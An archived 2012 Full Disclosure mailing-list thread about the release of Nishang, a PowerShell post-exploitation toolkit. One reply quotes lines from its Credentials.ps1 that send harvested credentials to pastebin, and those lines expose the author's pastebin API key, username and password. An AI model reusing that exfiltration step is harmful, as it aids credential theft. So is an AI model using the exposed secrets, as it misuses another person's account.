Full Disclosure mailing list archives

Re: Nishang: PowerShell for Penetration Testing

From: Harry Hoffman <hhoffman () ip-solutions net>
Date: Thu, 16 Aug 2012 08:39:03 -0400

Some time ago a colleague and I collaborated on a bit of software that
analyzed and reported on interesting/unknown/anomalous logs.

It reported via email. We published the code to the web in the hope
others would find it useful. I forgot and left my email addr as the
default mail to.

You'd be amazed that: a) people don't bother to look through the
code/configs and b) how much information you can gather when people
inadvertently send you all of their logs.

Just sayin'

Cheers,
Harry

On 08/15/2012 03:25 PM, Peter Dawson wrote:

....and this is coming from person who is "has many  years experience in
Penetration Testing of many Government Organizations of India and other
global corporate giants.
 
Who the friggin hell hires such peeps who give away key /userid/pwd eh ?
 
/pd
 
On Wed, Aug 15, 2012 at 2:52 PM, Harry Hoffman
<hhoffman () ip-solutions net <mailto:hhoffman () ip-solutions net>> wrote:

    Probably at the least want to change your pastebin password and api key:

    >From Credentials.ps1:

    Post_http "http://pastebin.com/api/api_login.php";
    "api_dev_key=8e5dbe7c4288c87f41b1e3e2ffce6c25&api_user_name=koshish&api_user_password=nikhilpastebin"

    Post_http "http://pastebin.com/api/api_post.php";
    
"api_user_key=$session_key&api_option=paste&api_dev_key=8e5dbe7c4288c87f41b1e3e2ffce6c25&api_paste_name=creds&api_paste_code=$pastevalue&api_paste_private=2"

    "

    Cheers,
    Harry

    On 08/15/2012 05:49 AM, Nikhil Mittal wrote:
    > Hi List,
    >
    > I have written a tool in PowerShell which helps in usage of PowerShell
    > for post exploitation activity. The tool, called, Nishang. is a
    > framework and collection of PowerShell scripts.
    >
    > Details about it could be found on my blog at
    >
    http://labofapenetrationtester.blogspot.com/2012/08/introducing-nishang-powereshell-for.html
    >
    > The toolkit is available at:
    > http://code.google.com/p/nishang/
    >
    > Please feel free to report bugs, feedbacks and feature requests.
    >
    > Regards,
    > Nikhil _SamratAshok_ Mittal
    > http://labofapenetrationtester.blogspot.com/
    > @nikhil_mitt <https://twitter.com/#%21/nikhil_mitt>
    >
    >
    > _______________________________________________
    > Full-Disclosure - We believe in it.
    > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    > Hosted and sponsored by Secunia - http://secunia.com/
    >

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Nishang: PowerShell for Penetration Testing Nikhil Mittal (Aug 15)
- Re: Nishang: PowerShell for Penetration Testing Harry Hoffman (Aug 15)
  - Re: Nishang: PowerShell for Penetration Testing Peter Dawson (Aug 15)
    - Re: Nishang: PowerShell for Penetration Testing Harry Hoffman (Aug 16)